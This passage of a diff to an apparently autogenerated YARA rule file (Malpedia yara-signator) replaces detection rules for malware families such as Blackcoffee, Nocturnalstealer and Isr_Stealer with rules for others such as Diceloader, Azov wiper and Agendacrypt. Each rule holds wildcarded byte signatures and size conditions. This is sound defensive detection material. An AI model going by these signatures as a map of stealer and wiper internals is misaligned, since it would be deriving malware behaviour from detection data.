+		$sequence_2 = { 33d2 6bc003 85c0 7664 48 f7f7 }
+		$sequence_3 = { 53 8b1d???????? 40 8bf0 6a02 8d7e7e 57 }
+		$sequence_4 = { f8 660fb3d9 30d1 8b4e08 e8???????? 60 53 }
+		$sequence_5 = { ffd3 8db7f4030000 e8???????? 8d85fcfeffff 50 }
+		$sequence_6 = { 53 8b1d???????? 57 8bf8 eb07 57 ffd3 }
+		$sequence_7 = { 8a06 3c41 7430 3c42 742c 56 }
+		$sequence_8 = { e8???????? 52 ff742404 c745d843686563 ff3424 c6442404f2 }
+		$sequence_9 = { 56 8d45dc e8???????? 8d45ec 50 ff7620 ff15???????? }
 
 	condition:
-		7 of them and filesize < 540672
+		7 of them and filesize < 172032
 }
-rule MALPEDIA_Win_Blackcoffee_Auto : FILE
+rule MALPEDIA_Win_Diceloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4f36c9cd-a889-561b-ae61-a577c98570f5"
+		id = "593cd06d-f8dd-5a0b-859e-ad7b04c5325f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcoffee"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.blackcoffee_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.diceloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.diceloader_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "0bd95226ab3597279ec9c63042069446fb610a5d850507e2f23654627aa44494"
+		logic_hash = "e070fb94fcf5f24a6795b4dab69a3a87130002e18415d4a25f346061fa315110"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136060,32 +136587,32 @@ rule MALPEDIA_Win_Blackcoffee_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 89460c eb03 897e0c 53 ff15???????? 8bc6 }
-		$sequence_1 = { ff75b8 e8???????? 89460c ff15???????? 894610 8d8534ffffff }
-		$sequence_2 = { 57 8bf0 ff7508 8d450c 50 8d4604 50 }
-		$sequence_3 = { f3ab 8d8568ffffff 33f6 50 c745fc04010000 c78568ffffff94000000 }
-		$sequence_4 = { 6a1c 6a40 aa ff15???????? 8bf0 8b4508 }
-		$sequence_5 = { 8bec 81ec08020000 80a5f8feffff00 57 }
-		$sequence_6 = { 59 8b35???????? 59 bf000000a0 57 }
-		$sequence_7 = { 8d4628 50 ffd3 8b45f4 }
-		$sequence_8 = { 8955f8 ff750c 6a00 ff15???????? 85c0 5f 741d }
-		$sequence_9 = { 8365fc00 83c010 6a04 50 8d45fc 50 }
+		$sequence_0 = { 488bf8 895808 89680c e8???????? }
+		$sequence_1 = { 4885c0 745a b924000000 e8???????? 0fb6c8 ba01000000 6bc107 }
+		$sequence_2 = { 895808 89680c e8???????? 48894710 488d4f1c }
+		$sequence_3 = { 4889742410 48897c2418 4156 4883ec30 8bf2 ff15???????? }
+		$sequence_4 = { 0f8483000000 8b5de8 3bf3 7c81 448b6dd8 41b81e000000 488d4d58 }
+		$sequence_5 = { 41b9983a0000 488d1daa2a0000 8bcf 488bd3 ff15???????? 488b0b ff15???????? }
+		$sequence_6 = { 468b540324 4d03c8 4d03d0 418b11 }
+		$sequence_7 = { b001 eb45 8b410c 99 2bc2 }
+		$sequence_8 = { 448b541620 8b5c1624 4c03d2 4803da 4533c9 458d7901 458b02 }
+		$sequence_9 = { 4983c602 4c03f7 498bd6 ffd5 }
 
 	condition:
-		7 of them and filesize < 118784
+		7 of them and filesize < 41984
 }
-rule MALPEDIA_Win_Malumpos_Auto : FILE
+rule MALPEDIA_Win_Hemigate_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8c530445-714c-5545-b19e-0b83bc49baf4"
+		id = "0161e2c6-92a2-598c-bebd-ec068752da7a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.malumpos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.malumpos_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hemigate"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hemigate_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "3114be15227a95c744ccca089995ccddd28287774a7cad476fe879d040c5b1ad"
+		logic_hash = "e109cb20ab0eaf9ed1c42d9088faaba592aaa23fc85ca45654d9c255b46038b9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136099,32 +136626,32 @@ rule MALPEDIA_Win_Malumpos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 25ffffffff f8 ff45fc 0fb705???????? 8b55fc 8d0441 }
-		$sequence_1 = { 750b 68???????? e8???????? 59 8d45cc }
-		$sequence_2 = { 57 2d00000000 5f 7b03 f6c7cb 0af6 f7c344f267d3 }
-		$sequence_3 = { 5b 7c05 53 80c400 5b }
-		$sequence_4 = { 5f 5f 5f 90 7b07 56 7603 }
-		$sequence_5 = { 7805 0500000000 57 3500000000 }
-		$sequence_6 = { 8a0432 3c3d 7506 8365fc00 eb0d }
-		$sequence_7 = { 7429 8b45f4 3b4618 7321 }
-		$sequence_8 = { a3???????? 391d???????? 7515 be???????? e8???????? 50 }
-		$sequence_9 = { 66a94a47 83c000 56 7e04 57 85c9 }
+		$sequence_0 = { f7db 895dd4 663bca 0f83b6000000 eb10 663bc8 0f86ab000000 }
+		$sequence_1 = { 8bfa 0fb64610 8b5610 8845dc 8bc2 c1e808 8845dd }
+		$sequence_2 = { e8???????? 6a3c 8bf0 6a00 56 89b5f4feffff e8???????? }
+		$sequence_3 = { 8d4bfe c6460200 8d5901 eb04 85db 7411 8bc2 }
+		$sequence_4 = { e8???????? eb0b 6a01 50 51 8bcf e8???????? }
+		$sequence_5 = { ff37 e8???????? 57 e8???????? 83c414 6a00 ff75f8 }
+		$sequence_6 = { 0f8cae020000 0fb6140f 0fb6440f01 c1e208 03d0 0fb6440f02 c1e208 }
+		$sequence_7 = { 8945f4 8bc6 85c0 0f84dd000000 90 48 83f80e }
+		$sequence_8 = { 741a 8d45f4 50 6a04 ff75f8 ff15???????? 6a00 }
+		$sequence_9 = { c3 ff75f8 ff15???????? 83c404 5f 5e b80d000000 }
 
 	condition:
-		7 of them and filesize < 542720
+		7 of them and filesize < 991232
 }
-rule MALPEDIA_Win_Dispcashbr_Auto : FILE
+rule MALPEDIA_Win_Rincux_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "70fd1e85-83ca-549b-b752-3572dac97120"
+		id = "8d755739-a59d-591b-8d5d-874be1eebc41"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dispcashbr"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dispcashbr_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rincux"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rincux_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "1d5a00b182201f928fd4d6b3f1036a475f5957d210fb4c8d3527862a6527bc4d"
+		logic_hash = "7c862e7ddc61d94d5055385764a3b34165e25fd304c6c127ff548146450f782d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136138,32 +136665,32 @@ rule MALPEDIA_Win_Dispcashbr_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83ec08 c7442408ceffffff c7442404???????? }
-		$sequence_1 = { e8???????? 83ec08 c7442408eaffffff c7442404???????? }
-		$sequence_2 = { 83ec04 c744240404000000 890424 e8???????? 83ec08 c7442408d9ffffff c7442404???????? }
-		$sequence_3 = { c744240404000000 890424 e8???????? 83ec08 c7442408f3ffffff c7442404???????? }
-		$sequence_4 = { e8???????? 83ec04 c744240404000000 890424 e8???????? 83ec08 c7442408ceffffff }
-		$sequence_5 = { 83ec08 c7442408caffffff c7442404???????? a1???????? 83c020 890424 e8???????? }
-		$sequence_6 = { c7442408c8ffffff c7442404???????? a1???????? 83c020 890424 e8???????? }
-		$sequence_7 = { 890424 e8???????? eb45 c70424f5ffffff }
-		$sequence_8 = { 83ec08 c7442408ccffffff c7442404???????? a1???????? }
-		$sequence_9 = { e8???????? 83ec08 c7442408ccffffff c7442404???????? }
+		$sequence_0 = { 8bce 52 e8???????? 8bf8 8d8424d0040000 50 8bce }
+		$sequence_1 = { 7348 e9???????? 8b4c2458 8b6c2414 c7411880730210 c7001d000000 eb2c }
+		$sequence_2 = { 83ff07 6810010000 752a e8???????? 83c404 89442418 85c0 }
+		$sequence_3 = { 7e5d 8b4518 89442410 eb04 8b5c2418 8b4c2410 }
+		$sequence_4 = { 83fd03 7330 85ff 0f840e0c0000 33c9 8b442410 }
+		$sequence_5 = { e8???????? 8d4c2400 c784247c010000ffffffff e8???????? }
+		$sequence_6 = { 8bca 83e103 f3a4 8dbc2438040000 83c9ff f2ae f7d1 }
+		$sequence_7 = { c1ea08 89500c 8b4310 f6c402 7425 8b442410 8d4c2424 }
+		$sequence_8 = { c7856cfdffff18000000 e8???????? 8bce e8???????? 33c0 8b4df4 }
+		$sequence_9 = { ffd7 8d84246c030000 6804010000 50 ffd3 8d8c246c030000 68???????? }
 
 	condition:
-		7 of them and filesize < 123904
+		7 of them and filesize < 392192
 }
-rule MALPEDIA_Win_Anchormtea_Auto : FILE
+rule MALPEDIA_Win_Azov_Wiper_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "75878680-af6e-531f-abbe-374c7f6b18e7"
+		id = "3b7f586d-ba57-5a04-8f68-255a064cb459"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.anchormtea"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.anchormtea_auto.yar#L1-L152"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.azov_wiper"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.azov_wiper_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "b646f5ea9da3552482b100437224e4af5475bebe8d62d4511d1baeeadc61942b"
+		logic_hash = "011364438eb01e088c781e3c84797626beea4dfb11a3cc9222e67a61e76881e5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136177,37 +136704,32 @@ rule MALPEDIA_Win_Anchormtea_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? f7d8 1bc0 83e002 }
-		$sequence_1 = { 83c40c 6808020000 6a40 ffd6 }
-		$sequence_2 = { bb01000000 8910 eb02 33db 85f6 }
-		$sequence_3 = { 7512 488d056aaf0100 483bc8 7406 e8???????? }
-		$sequence_4 = { 8b4508 57 8945d0 8d45c8 57 50 }
-		$sequence_5 = { c68524f7ffff00 8d8d98f7ffff ffb524f7ffff 52 }
-		$sequence_6 = { 41397e24 0f86ee010000 6666660f1f840000000000 4d8bc5 33d2 }
-		$sequence_7 = { 488b4b48 4885c9 740a ff15???????? 48897b48 }
-		$sequence_8 = { 488bcb e8???????? 488bcb ff15???????? 4885f6 7419 }
-		$sequence_9 = { 3bc1 0f44d9 85f6 7407 56 }
-		$sequence_10 = { 6f 4b 0010 6f 4b 0010 }
-		$sequence_11 = { 488d4808 488d15c2180200 e8???????? 85c0 }
-		$sequence_12 = { b801000000 488bbc24f0080000 488bb42420090000 488bac2418090000 }
-		$sequence_13 = { 488bcf 4c8bc3 4c2bc7 6690 }
-		$sequence_14 = { 898534ffffff 7202 8b12 8bc2 8d7002 660f1f440000 }
+		$sequence_0 = { 488d942460020000 488d4c2430 488b00 ff9078010000 488b3d???????? f20f10842460020000 488b4710 }
+		$sequence_1 = { 4831f6 4801c6 4883c03c 4831d2 8b10 4883ec08 }
+		$sequence_2 = { 488d144a 66833a5c 740b 4883ea02 83c0ff }
+		$sequence_3 = { 488bf1 498943c8 498d7bc8 488d055ffbffff 33db 498943d0 }
+		$sequence_4 = { 488b05???????? bafe010000 488bd9 33f6 4c8b00 41ff9048010000 ffc8 }
+		$sequence_5 = { 0f1f4000 488938 48897808 48897810 488d4040 }
+		$sequence_6 = { 41ff9258010000 488b8c2470080000 4885c9 7410 488b05???????? 488b10 ff9268010000 }
+		$sequence_7 = { 448d4904 41ff5208 4c8bc8 4885c0 }
+		$sequence_8 = { ffc0 8bc8 488d156cfaffff 4c8d0409 }
+		$sequence_9 = { 488d05acf3ffff 4883ec08 48890c24 48c7c1619afeff }
 
 	condition:
-		7 of them and filesize < 839680
+		7 of them and filesize < 73728
 }
-rule MALPEDIA_Win_Slave_Auto : FILE
+rule MALPEDIA_Win_Vskimmer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b045c957-b6f9-5c69-b89f-41a2fc8766bd"
+		id = "60bc81a1-a857-5ddb-833d-12c04ee64d84"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.slave"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.slave_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vskimmer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.vskimmer_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "32dc8f0602dd0c995ffd6f35edd82eaee41a96ee44816d90c15c92afe3d59d57"
+		logic_hash = "3a5deb80227e8fbb07640a24d78b7397cb1bc684cae3032e29532961361bc773"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136221,32 +136743,32 @@ rule MALPEDIA_Win_Slave_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c0eb06 0ad8 8899e7020000 8a17 d0ea 32d3 80e21c }
-		$sequence_1 = { 50 ffd3 008608010000 83c40c 83be1403000000 8a8e08010000 7c3a }
-		$sequence_2 = { 33c7 03c1 81c28647beef 03d0 8b45d4 }
-		$sequence_3 = { 837df400 0f846c2d0000 8a8608030000 240f 0fb6c0 66894706 }
-		$sequence_4 = { 8b45ec 8b00 894720 8b45ec 8b4004 894724 e9???????? }
-		$sequence_5 = { f6c110 7509 80c910 888e94030000 8a475d 24bf 0c20 }
-		$sequence_6 = { 33c8 8bc3 8b5dd8 c1c806 33c8 8bc7 }
-		$sequence_7 = { 50 8d4208 50 ff15???????? 8b45fc 2bfe f30f7e05???????? }
-		$sequence_8 = { 3a4202 750d 83feff 741c 8a4103 3a4203 7414 }
-		$sequence_9 = { 810e80000100 f70600400000 8b550c 743c 0fb68707030000 808f0603000002 c1e804 }
+		$sequence_0 = { 33c0 8b8dbcfdffff 6bc009 0fb6840808e64100 6a08 c1e804 5e }
+		$sequence_1 = { ff15???????? 53 8d85ecfbffff 50 68???????? 8d85f8feffff }
+		$sequence_2 = { 8d85b0fdffff 57 50 e8???????? 8d85a4faffff }
+		$sequence_3 = { ff75e8 8b4c3038 e8???????? 83f8ff 7506 834dec04 eba0 }
+		$sequence_4 = { e8???????? ff7508 8b10 8bc8 ff5208 8b4e10 884508 }
+		$sequence_5 = { 3bc6 751c 85c9 7508 c70703000000 eb37 }
+		$sequence_6 = { 6a01 8d8dc8fcffff e8???????? e8???????? c3 6a08 }
+		$sequence_7 = { 7508 c70703000000 eb37 83f901 }
+		$sequence_8 = { 75da 8b4508 8b4d10 8908 e9???????? 55 }
+		$sequence_9 = { 8d858cf7ffff 8bcc 89a5c0f6ffff 50 e8???????? }
 
 	condition:
-		7 of them and filesize < 532480
+		7 of them and filesize < 376832
 }
-rule MALPEDIA_Win_Nocturnalstealer_Auto : FILE
+rule MALPEDIA_Win_Fk_Undead_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b2ebf655-b369-5222-91b5-1580e525a57e"
+		id = "09ebce3e-04fb-58d5-b09d-0377a5f5743c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nocturnalstealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nocturnalstealer_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fk_undead"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fk_undead_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "2c6b243d35f29c591c5668acf471c8a2107f8e8d4171dce50c484f231af2f2ed"
+		logic_hash = "abdf12f66e02014f48d8c0536c0de5b8efd3d3aad1408262170db0f8bbb09349"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136260,32 +136782,32 @@ rule MALPEDIA_Win_Nocturnalstealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? 53 c70424e630fe1e 890424 51 e9???????? 81f2150c9f7b }
-		$sequence_1 = { ce f24b 0205???????? d91ca2 ac 97 8c80313ff9c1 }
-		$sequence_2 = { e9???????? 01c6 e9???????? 50 54 e9???????? 01d9 }
-		$sequence_3 = { e9???????? 59 c1ef01 81f7???????? 81cf424a8d6f e9???????? 52 }
-		$sequence_4 = { e9???????? 50 e9???????? 8b2c24 83c404 81e801000000 0f853bffffff }
-		$sequence_5 = { e9???????? f7db 81f3a7b72281 57 bf57bc7f6f 56 e9???????? }
-		$sequence_6 = { ff3424 e9???????? 81e942e2bf7f 01d9 81c142e2bf7f e9???????? 872c24 }
-		$sequence_7 = { e9???????? 01ea 5d e9???????? 29c5 58 332c24 }
-		$sequence_8 = { 89e0 0504000000 83e804 870424 5c 892c24 e9???????? }
-		$sequence_9 = { e9???????? 59 52 89f2 89d0 5a e9???????? }
+		$sequence_0 = { 741e 8d4c2428 51 8b4c2424 8d542428 52 56 }
+		$sequence_1 = { 81c2fcff0000 3bd6 7303 894d00 8b4500 33c9 668908 }
+		$sequence_2 = { 0f8290000000 81394e544c4d 0f8584000000 81790453535000 757b 8b4108 3b05???????? }
+		$sequence_3 = { eb2b 8b54242c 68???????? 68???????? 68???????? 68???????? 55 }
+		$sequence_4 = { e8???????? 8b0b 8d042f 66894114 8b13 b81c000000 66894216 }
+		$sequence_5 = { 3a5608 7514 0fb74616 0fb74f16 03c6 50 03cf }
+		$sequence_6 = { 52 50 33ff 51 897c2420 e8???????? 8b5c2420 }
+		$sequence_7 = { 57 6812270000 56 e8???????? 6a00 682c4e0000 56 }
+		$sequence_8 = { 8906 33c0 c7466428e40410 c7466800000000 c7466c00000000 c7464000000000 c7869800000000000000 }
+		$sequence_9 = { 7414 8bd1 c1f805 83e21f c1e206 031485e0650a10 eb02 }
 
 	condition:
-		7 of them and filesize < 10739712
+		7 of them and filesize < 1418240
 }
-rule MALPEDIA_Win_Gameover_Dga_Auto : FILE
+rule MALPEDIA_Win_Agendacrypt_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bc53f1bb-3d03-5486-b6a3-f98ff0c8f6cd"
+		id = "dc53611f-1b74-52ad-9b55-d5a83620a37c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_dga"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gameover_dga_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.agendacrypt"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.agendacrypt_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "a8d5697f9821aacef2a257fe69d3238c984983b11a8fa8e5567f601d47382d80"
+		logic_hash = "d7e38346c9af348b4c2d13bd6ea77d0011438992fc08a00180dea033b3826496"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136299,32 +136821,32 @@ rule MALPEDIA_Win_Gameover_Dga_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 894c2414 50 51 8bce e8???????? 8bd8 85db }
-		$sequence_1 = { 7ed5 8b442418 3bd0 0f8426ebffff 837c241c00 8bcb 0f8525120000 }
-		$sequence_2 = { 8be5 5d c3 56 e8???????? 84c0 74e1 }
-		$sequence_3 = { c744242c05000000 e8???????? 6a37 8d54243c 59 e8???????? 56 }
-		$sequence_4 = { 8b4604 0345f0 5e 8be5 5d c20c00 83ec14 }
-		$sequence_5 = { 88442423 e8???????? 89442418 85c0 7425 8bc8 e8???????? }
-		$sequence_6 = { b001 c20400 51 f605????????01 56 57 8bf9 }
-		$sequence_7 = { 0f85500e0000 8b442438 5f 5e 5d 5b 83c420 }
-		$sequence_8 = { 0f94c0 c1e108 89442428 0fb64502 0bc8 0fb64503 c1e008 }
-		$sequence_9 = { 56 8bd9 57 8bf3 895c2414 6a00 83e601 }
+		$sequence_0 = { ff75f0 e8???????? 83c404 837dec00 740f a1???????? 56 }
+		$sequence_1 = { c7430c01010000 c7430886f70d01 c74304092a8648 884b10 894330 c70302000000 89d8 }
+		$sequence_2 = { 89ce 83f002 0b410c 752f 807e3002 7539 807e2002 }
+		$sequence_3 = { 8bbc2494000000 83d700 83d200 030cf0 135cf004 8b4508 890cf0 }
+		$sequence_4 = { a9ffffff7f 7551 ff75f0 e8???????? 83c410 5e 5f }
+		$sequence_5 = { 74e7 8b4e08 8b09 50 ffd1 83c404 8b4e08 }
+		$sequence_6 = { 8d4cde08 29da 894c2420 89542418 8d0cd500000000 51 50 }
+		$sequence_7 = { e9???????? c68424c803000004 b104 be04000000 31db 31ff 80f904 }
+		$sequence_8 = { c745b410764100 8945b8 8d45ec c745bc00474100 8945c0 8d45a0 c745c440ba4100 }
+		$sequence_9 = { e9???????? 8b55e8 0f1f8000000000 837dcc00 741f 6a02 68???????? }
 
 	condition:
-		7 of them and filesize < 540672
+		7 of them and filesize < 3340288
 }
-rule MALPEDIA_Win_Moker_Auto : FILE
+rule MALPEDIA_Win_Pandora_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ec63b288-3da6-5af3-8f29-c765a5000a5d"
+		id = "29457312-58e8-5036-91e5-0a52a49209e8"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.moker_auto.yar#L1-L161"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pandora"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pandora_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "556dd24334d18ecb022efe59f4ae9c093932948c0fb590b7b2557d6f9fb4e7d8"
+		logic_hash = "22cda535b77940d9842b4e203432bc4f86a63cc5bae293ffa14fa51707bd5eff"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136338,38 +136860,32 @@ rule MALPEDIA_Win_Moker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0302 8945d4 8b4dd4 83c102 }
-		$sequence_1 = { 0302 8945e8 8b4df8 8b55fc }
-		$sequence_2 = { 0100 83c414 85c0 7502 eb0a }
-		$sequence_3 = { 0301 8945e0 e8???????? 8b55e8 }
-		$sequence_4 = { 0302 8945dc 8b45dc 83c002 }
-		$sequence_5 = { 0302 50 e8???????? 83c404 3b450c 750b 8b4df0 }
-		$sequence_6 = { 6a00 6a04 8d9550ffffff 52 }
-		$sequence_7 = { 0302 8945e8 eb09 8b45e8 }
-		$sequence_8 = { 80fa20 720e 80fa7a 7709 feca 80fa1f 7502 }
-		$sequence_9 = { 803aed 0f84cc000000 803af8 7453 803aec 0f848e000000 803ae4 }
-		$sequence_10 = { 6a02 6804000008 68000000c0 ff7508 }
-		$sequence_11 = { 85c0 0f852f020000 6a01 ec }
-		$sequence_12 = { 42 41 ebec 803900 7509 }
-		$sequence_13 = { 740d 83c002 50 ff7508 }
-		$sequence_14 = { ed 2e5c 85c0 740b 40 50 }
-		$sequence_15 = { 83ec0c 51 52 8b450c 85c0 7451 }
+		$sequence_0 = { 415d c3 8b894c010000 4889742468 e8???????? 488bf0 4885c0 }
+		$sequence_1 = { 85c0 7541 895c2438 eb43 4c8d442438 488d542420 e8???????? }
+		$sequence_2 = { 33d2 448d4228 ffd0 488b4b58 e8???????? 488b4b50 4885c9 }
+		$sequence_3 = { 488b7c2440 488d542450 488d4c2438 e8???????? 85c0 0f85e5000000 488d45f0 }
+		$sequence_4 = { 57 4155 4156 488d6c24d0 4881ec30010000 8b01 498bd9 }
+		$sequence_5 = { c1c807 8bca c1ea03 c1c10e 33c8 33ca 4403c9 }
+		$sequence_6 = { 49ffc0 4c3bc7 72d2 488bd6 488d4def e8???????? 8bd8 }
+		$sequence_7 = { 440bc0 0fb602 41c1e008 440bc0 0fb64206 0bc8 4489442430 }
+		$sequence_8 = { 33d5 33542420 4133c2 33c3 d1c2 05d6c162ca c1cb02 }
+		$sequence_9 = { 0f84f7010000 833801 752d 0f1001 498d4b18 660f73d808 66490f7ec0 }
 
 	condition:
-		7 of them and filesize < 1761280
+		7 of them and filesize < 1032192
 }
-rule MALPEDIA_Win_Isr_Stealer_Auto : FILE
+rule MALPEDIA_Win_Webc2_Adspace_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f92134ff-d8ee-58cb-8cb8-468d7205306f"
+		id = "31690ec3-53d2-516a-a2ac-2daa7b554ffe"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.isr_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.isr_stealer_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_adspace"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.webc2_adspace_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "75691989209029cb7a637cf5df87a857ef3ef18b6fe3194f56cba1ecab86658c"
+		logic_hash = "7852a8a7e96f78b645860237edf52acf830636cf13e5faeed5b1eb81bda4c09a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136383,32 +136899,32 @@ rule MALPEDIA_Win_Isr_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { fb b05e 2bc1 e8???????? 661e }
-		$sequence_1 = { 08ac22c115978d 0e e8???????? 07 }
-		$sequence_2 = { 1c8b 53 2456 2bd1 807e6543 }
-		$sequence_3 = { 46 1e 301b 15c2c8c807 d6 12d8 }
-		$sequence_4 = { 8d16 b205 07 d32cb6 08ac22c115978d 0e e8???????? }
-		$sequence_5 = { a7 8d16 b205 07 d32cb6 08ac22c115978d }
-		$sequence_6 = { 07 fb b05e 2bc1 e8???????? }
-		$sequence_7 = { 8d16 b205 07 d32cb6 08ac22c115978d 0e }
-		$sequence_8 = { 07 d32cb6 08ac22c115978d 0e e8???????? }
-		$sequence_9 = { e8???????? 07 fb b05e 2bc1 e8???????? 661e }
+		$sequence_0 = { 8d8580feffff 68???????? 50 ffd6 ff750c 894510 }
+		$sequence_1 = { ffd6 8bf8 c70424???????? ffd6 }
+		$sequence_2 = { 50 8d8580feffff 50 e8???????? 8b35???????? 8d8580feffff }
+		$sequence_3 = { 8d4dec e8???????? 8d4dec e8???????? 6a0a ff15???????? a1???????? }
+		$sequence_4 = { c3 56 8b742408 56 e8???????? 59 8b4c2410 }
+		$sequence_5 = { 0f84f8010000 80a4241c01000000 6a3f 59 33c0 }
+		$sequence_6 = { 7469 6a00 57 56 }
+		$sequence_7 = { 50 e8???????? 83c40c 8bf8 8d45fc 50 }
+		$sequence_8 = { 59 33c0 85ff 59 }
+		$sequence_9 = { a1???????? 40 50 57 56 }
 
 	condition:
-		7 of them and filesize < 540672
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_Magniber_Auto : FILE
+rule MALPEDIA_Win_Mbrlock_Auto : FILE
 {
